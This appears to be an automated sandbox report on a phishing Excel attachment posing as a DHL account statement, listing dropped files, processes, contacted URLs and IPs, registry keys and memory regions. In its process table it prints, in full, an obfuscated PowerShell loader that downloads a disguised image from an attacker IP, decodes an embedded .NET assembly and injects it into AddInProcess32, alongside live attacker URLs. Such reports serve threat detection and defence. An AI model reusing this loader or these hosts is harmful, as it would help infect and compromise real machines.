Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\controlfiredatinloverforxlammfile[1].vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\adeol3mg.2hs.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sxdrru00.zev.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Desktop\~$DHL ESTADO DE CUENTA - 7664557687757.xlam.xls
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls;
oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch
{ Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) {
oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols;
oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag);
if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length
= oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes
= [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes);
oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]]
(Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls))
} }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient;
try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls
-ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData);
oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag);
oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex
+= '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+',
oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes);
oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull,
[object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls))
} }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient;
try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from
oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'+'TF8.GetString(oiLdown'+'loadedData);
oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ol'+'s<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag);
oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLs'+'tartIndex -ge 0 -and oiLendIndex -gt oiLstartIn'+'dex) { oiLstartIndex
+= '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - o'+'iLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartInd'+'ex,
oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64St'+'ring(oiLbase64Command); oiLl'+'oadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes);
oiLtype = oiLloadedAssembly.GetType(OlsRu'+'nPE.HomeO'+'ls); oiLmet'+'hod = oiLtype.GetMethod(Ol'+'sVA'+'IOls).Invoke(oi'+'Lnull,
[object[]'+'] (Olstxt.4446'+'sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls))
} }Set Scriptblock oiLlink = Olshttp://91.92.254.137/imge/new-image_'+'j.jpgOls; oiLwebClient = New-Object System.Net.WebClient;
try { o'+'iLdownloadedData = oiLwebClient.Down'+'loadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlin'+'kOls
-F'+'oregroundColor Red; exit }; if (oiLdownloadedData '+'-ne oiLnull) { oiLimageText = [System.Text.Encoding]::UT'+'F8.GetString(oiLdownloadedData);
oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag);
oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLsta'+'rtIndex
+= oiLstartFlag.Leng'+'th; oiLbase64Length'+' = oiLendIndex - oiLstartIndex; oiLbase64Command = o'+'iLimageText.Substring(oiLstartIndex,
oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String'+'(oiLbas'+'e64'+'Command)'+'; oiLloadedAssembly =
[System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE'+'.HomeOls); oiLmethod =
oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls
, Ol'+'sdesat'+'ivadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsdesativadoOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls;
oiLwebClient = New-Object System.Net.WebClient; try { oiLdownloadedData'+' = oiLwebClient.DownloadData'+'(oi'+'Llink) } catch
{ Wri'+'te-Host OlsFailed'+' To download data from oiLlinkOls -ForegroundCol'+'or Red; exit }; if ('+'oiLdownloadedData -ne
oiLnull) { oiLimageText = [System.Text.Encoding]::UTF8.GetString'+'(oiLdownloadedD'+'ata); oiLstartFlag = Ols<<BASE64_START>>Ols;
oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oi'+'LstartFlag); oiLendIndex = oiLimageText.I'+'ndexOf(oiLendFlag);
if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLst'+'ar'+'tFlag.Le'+'ngt'+'h; oiLbase64Length
= oiLendIndex - oiLstartIndex; oiLbase64Command = oi'+'LimageText'+'.Substring(oiLstar'+'tIndex, oi'+'Lbase64Length)'+'; '+'oi'+'LcommandBytes
= [System.Conv'+'e'+'rt'+']::FromBase64String(oiLbase64Command); oiLloadedA'+'ssembly = [System.Ref'+'lection.Assembly]::Load(oiLcommandBytes);
oiLtyp'+'e = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]]
(Olstxt.4446sa'+'bbbbbbbe'+'wmadam/441.871'+'.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,Ols'+'AddInProcess32Ols,OlsO'+'ls))
} }Set Scriptblock oiLlink = Olshttp://91.92'+'.254.'+'19'+'4/imge/new-image_v.jpgOls; oiLwebClient = New-Object System.Net.WebClient;
try {'+' oiLdow'+'nloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host '+'OlsFailed To download data from
oiLlink'+'Ols -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = ['+'System.Text.Encoding]::UTF8.GetString(oiLd'+'ownloadedData);
oiLstartFlag = Ols<<BASE64_START>>Ols; oiL'+'endFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag);
oiLendIndex = oiLimageText.IndexOf(oiLendFlag);'+' if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex
+= oiLstar'+'tFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartIndex,
oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLload'+'ed'+'Assembly = [System.Reflection.Assembly]::Load'+'(oiLcommandBytes);
oiLt'+'ype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLty'+'pe.GetMethod(OlsV'+'AIOls).Invoke(oiLnull, [object[]]
(Olstxt.56esaberiflortnoc/441.871.64.891//:pt'+'thOls , Ol'+'sdesativadoOls , '+'OlsdesativadoOls , Olsdesativa'+'doOls,OlsAddInProcess32Ols,OlsOls))
} }').RePlAcE('Ols',[sTrInG][ChaR]39).RePlAcE(([ChaR]111+[ChaR]105+[ChaR]76),[sTrInG][ChaR]36) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://91.92.254.194/imge/new-image_v.jpg
|
91.92.254.194
|
|
|
|
http://198.46.178.144/madamwebbbbbbbas6444.txt
|
198.46.178.144
|
|
|
|
http://91.92.254.194/imge/new-image_v.jpgOls;
|
unknown
|
|
|
|
http://198.46.178.144/controlfirebase65.txt
|
198.46.178.144
|
|
|
|
http://198.46.178.144/controlfiredatinloverforxlammfile.vbs
|
198.46.178.144
|
|
|
|
http://91.92
|
unknown
|
|
|
|
http://91.92.254.194
|
unknown
|
|
|
|
http://91.92.25
|
unknown
|
|
|
|
http://91.92.2
|
unknown
|
|
|
|
http://91.92.254.137/imge/new-image_
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txtz
|
unknown
|
||
|
http://198.46.178.144/controlfiredatinloverforxlammfile.vbsj
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://198.46.178.144
|
unknown
|
||
|
http://www.w3.
|
unknown
|
||
|
http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txt
|
unknown
|
||
|
http://91.92.254.137/imge/new-image_j.jpg
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
198.46.178.144
|
unknown
|
United States
|
|
|
|
91.92.254.14
|
unknown
|
Bulgaria
|
|
|
|
91.92.254.194
|
unknown
|
Bulgaria
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
;5(
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
>:(
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 28 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3D60000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
411B000
|
trusted library allocation
|
page read and write
|
|
|
|
57FF000
|
stack
|
page read and write
|
||
|
4F49000
|
heap
|
page read and write
|
||
|
292000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
trusted library allocation
|
page execute and read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
540D000
|
stack
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
51FE000
|
stack
|
page read and write
|
||
|
2360000
|
trusted library allocation
|
page read and write
|
||
|
469E000
|
stack
|
page read and write
|
||
|
570A000
|
heap
|
page read and write
|
||
|
20F0000
|
heap
|
page execute and read and write
|
||
|
5B0000
|
trusted library allocation
|
page read and write
|
||
|
543E000
|
stack
|
page read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
54ED000
|
stack
|
page read and write
|
||
|
611C000
|
stack
|
page read and write
|
||
|
855000
|
heap
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
217E000
|
stack
|
page read and write
|
||
|
180000
|
trusted library allocation
|
page read and write
|
||
|
5CF2000
|
heap
|
page read and write
|
||
|
888000
|
heap
|
page read and write
|
||
|
87A000
|
heap
|
page read and write
|
||
|
A00000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
598000
|
trusted library allocation
|
page read and write
|
||
|
23E9000
|
trusted library allocation
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page read and write
|
||
|
282000
|
trusted library allocation
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
369000
|
stack
|
page read and write
|
||
|
AB0000
|
trusted library allocation
|
page read and write
|
||
|
170000
|
trusted library allocation
|
page read and write
|
||
|
120000
|
trusted library allocation
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
521000
|
heap
|
page read and write
|
||
|
22AF000
|
stack
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
21CA000
|
trusted library allocation
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
23DF000
|
stack
|
page read and write
|
||
|
4B60000
|
heap
|
page execute and read and write
|
||
|
212000
|
trusted library allocation
|
page read and write
|
||
|
2AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
598000
|
trusted library allocation
|
page read and write
|
||
|
2350000
|
trusted library allocation
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
532E000
|
stack
|
page read and write
|
||
|
8BF000
|
heap
|
page read and write
|
||
|
51BE000
|
stack
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
470E000
|
stack
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
594E000
|
stack
|
page read and write
|
||
|
5B8000
|
heap
|
page read and write
|
||
|
4750000
|
heap
|
page execute and read and write
|
||
|
1AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
5B00000
|
heap
|
page read and write
|
||
|
20FE000
|
stack
|
page read and write | page guard
|
||
|
87A000
|
heap
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4800000
|
heap
|
page execute and read and write
|
||
|
32D9000
|
trusted library allocation
|
page read and write
|
||
|
57FF000
|
stack
|
page read and write
|
||
|
249E000
|
trusted library allocation
|
page read and write
|
||
|
552F000
|
heap
|
page read and write
|
||
|
1FB000
|
stack
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
58FF000
|
stack
|
page read and write
|
||
|
21C8000
|
trusted library allocation
|
page read and write
|
||
|
473E000
|
stack
|
page read and write
|
||
|
633D000
|
trusted library allocation
|
page read and write
|
||
|
5AAE000
|
stack
|
page read and write
|
||
|
3D8000
|
stack
|
page read and write
|
||
|
5B7E000
|
stack
|
page read and write
|
||
|
583B000
|
heap
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
660000
|
trusted library allocation
|
page execute and read and write
|
||
|
C50000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
56F0000
|
heap
|
page read and write
|
||
|
24C0000
|
trusted library allocation
|
page read and write
|
||
|
5E71000
|
heap
|
page read and write
|
||
|
581E000
|
stack
|
page read and write
|
||
|
283F000
|
stack
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
trusted library allocation
|
page read and write
|
||
|
4E33000
|
heap
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
550000
|
trusted library allocation
|
page read and write
|
||
|
147000
|
heap
|
page read and write
|
||
|
555000
|
heap
|
page read and write
|
||
|
22AE000
|
stack
|
page read and write | page guard
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
38AF000
|
stack
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A3E000
|
stack
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
291F000
|
stack
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
5F80000
|
heap
|
page read and write
|
||
|
5829000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
182000
|
trusted library allocation
|
page read and write
|
||
|
4B2C000
|
stack
|
page read and write
|
||
|
2255000
|
trusted library allocation
|
page read and write
|
||
|
318000
|
stack
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
1F10000
|
direct allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
122B000
|
stack
|
page read and write
|
||
|
911000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
24AE000
|
trusted library allocation
|
page read and write
|
||
|
85A000
|
heap
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
12D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5CD0000
|
heap
|
page read and write
|
||
|
5520000
|
heap
|
page read and write
|
||
|
64A000
|
heap
|
page read and write
|
||
|
20FF000
|
stack
|
page read and write
|
||
|
5A0000
|
trusted library allocation
|
page read and write
|
||
|
4B9F000
|
stack
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
498F000
|
stack
|
page read and write
|
||
|
526E000
|
stack
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
44BE000
|
stack
|
page read and write
|
||
|
553D000
|
heap
|
page read and write
|
||
|
5990000
|
heap
|
page read and write
|
||
|
4D3E000
|
stack
|
page read and write
|
||
|
865000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
5C8000
|
trusted library allocation
|
page read and write
|
||
|
A74000
|
heap
|
page read and write
|
||
|
5540000
|
heap
|
page read and write
|
||
|
32B1000
|
trusted library allocation
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
7D3000
|
heap
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
501A000
|
heap
|
page read and write
|
||
|
4FA000
|
heap
|
page read and write
|
||
|
240000
|
trusted library allocation
|
page execute and read and write
|
||
|
227000
|
trusted library allocation
|
page execute and read and write
|
||
|
36A000
|
heap
|
page read and write
|
||
|
16A000
|
trusted library allocation
|
page read and write
|
||
|
3BE000
|
stack
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
87E000
|
stack
|
page read and write
|
||
|
28D000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
9C0000
|
trusted library allocation
|
page read and write
|
||
|
312000
|
heap
|
page read and write
|
||
|
B50000
|
trusted library allocation
|
page read and write
|
||
|
3E0000
|
trusted library allocation
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
20A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C7000
|
heap
|
page read and write
|
||
|
4C9E000
|
stack
|
page read and write
|
||
|
262000
|
heap
|
page read and write
|
||
|
4E9C000
|
stack
|
page read and write
|
||
|
824000
|
heap
|
page read and write
|
||
|
174000
|
trusted library allocation
|
page read and write
|
||
|
4824000
|
heap
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1010000
|
trusted library allocation
|
page execute and read and write
|
||
|
29A000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A000
|
stack
|
page read and write
|
||
|
56B0000
|
heap
|
page read and write
|
||
|
